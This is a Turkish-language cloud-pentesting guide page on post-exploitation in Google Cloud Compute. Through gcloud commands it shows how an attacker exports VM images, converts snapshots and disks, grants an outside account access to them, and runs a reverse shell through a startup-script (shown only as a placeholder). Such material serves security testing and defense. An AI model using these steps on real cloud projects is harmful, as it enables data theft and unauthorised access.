GCP - Compute Post Exploitation

Compute

Compute ve VPC (Ağ) hakkında daha fazla bilgi için kontrol edin:

Görüntüleri yerel olarak dışa aktarın ve inceleyin

Bu, bir saldırganın zaten mevcut görüntülerde bulunan verilere erişmesine veya çalışan VM'lerin yeni görüntülerini oluşturmasına ve çalışan VM'ye erişim olmadan verilerine erişmesine olanak tanır.

Bir VM görüntüsünü bir bucket'a dışa aktarmak ve ardından indirmek ve yerel olarak bağlamak mümkündür.

gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# The download the export from the bucket and mount it locally

Bu işlemi gerçekleştirmek için saldırganın depolama kovası üzerinde yetkilere ve kesinlikle cloudbuild üzerinde yetkilere ihtiyacı olabilir, çünkü bu hizmet dışa aktarma işlemini gerçekleştirmesi istenecektir. Ayrıca, bunun çalışması için codebuild SA ve compute SA'nın ayrıcalıklı izinlere ihtiyacı vardır. Cloudbuild SA <project-id>@cloudbuild.gserviceaccount.com için gerekli olanlar:

• roles/iam.serviceAccountTokenCreator

• roles/compute.admin

• roles/iam.serviceAccountUser

Ve SA <project-id>-compute@developer.gserviceaccount.com için gerekli olanlar:

• roles/compute.storageAdmin

• roles/storage.objectAdmin

Anlık Görüntüleri ve Diskleri Yerel Olarak Dışa Aktarma ve İnceleme

Anlık görüntüleri ve diskleri doğrudan dışa aktarmak mümkün değildir, ancak bir anlık görüntüyü bir diske, bir diski bir görüntüye dönüştürmek ve önceki bölümdeki adımları takip ederek, o görüntüyü dışa aktararak yerel olarak incelemek mümkündür.

# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]

Bir VM Oluşturarak Bir Görüntüyü İnceleme

Bir saldırganın bir görüntü oluşturduğu yerden bir görüntüde depolanan verilere veya çalışan bir VM içindeki verilere erişim sağlama amacıyla, bir dış hesaba görüntüye erişim izni vermek mümkündür:

gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'

ve ardından ondan yeni bir VM oluşturun:

gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]

Eğer dış hesabınıza görüntü üzerinden erişim veremiyorsanız, kurbanın projesinde o görüntüyü kullanarak bir VM başlatabilir ve metadata'yı bir ters shell çalıştıracak şekilde ayarlayarak görüntüye erişmek için parametre ekleyebilirsiniz:

--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'

Bir Snapshot/Disk'i Bir VM'ye Bağlayarak İnceleme

Bir disk veya snapshot'ta depolanan verilere erişim sağlama amacıyla, snapshot'ı bir diske, diski bir imaja dönüştürebilir ve önceki adımları takip edebilirsiniz.

Ya da bir dış hesaba disk üzerinde erişim verebilirsiniz (başlangıç noktası bir snapshot ise, snapshot üzerinde erişim verin veya ondan bir disk oluşturun):

gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'

Bir diski bir örneğe ekleyin:

gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]

Diski VM içinde bağlayın:

1. VM'ye SSH ile bağlanın:

gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]

1. Diski Tanımlayın: VM'ye girdikten sonra, disk cihazlarını listeleyerek yeni diski tanımlayın. Genellikle, /dev/sdb, /dev/sdc gibi bulabilirsiniz.

2. Diski Formatlayın ve Bağlayın (eğer yeni veya ham bir diskse):

• Bir bağlama noktası oluşturun:

sudo mkdir -p /mnt/disks/[MOUNT_DIR]

• Diski bağlayın:

sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]

Eğer snapshot veya diske dış bir projeye erişim veremiyorsanız, bu işlemleri snapshot/disk ile aynı projedeki bir örnek içinde gerçekleştirmeniz gerekebilir.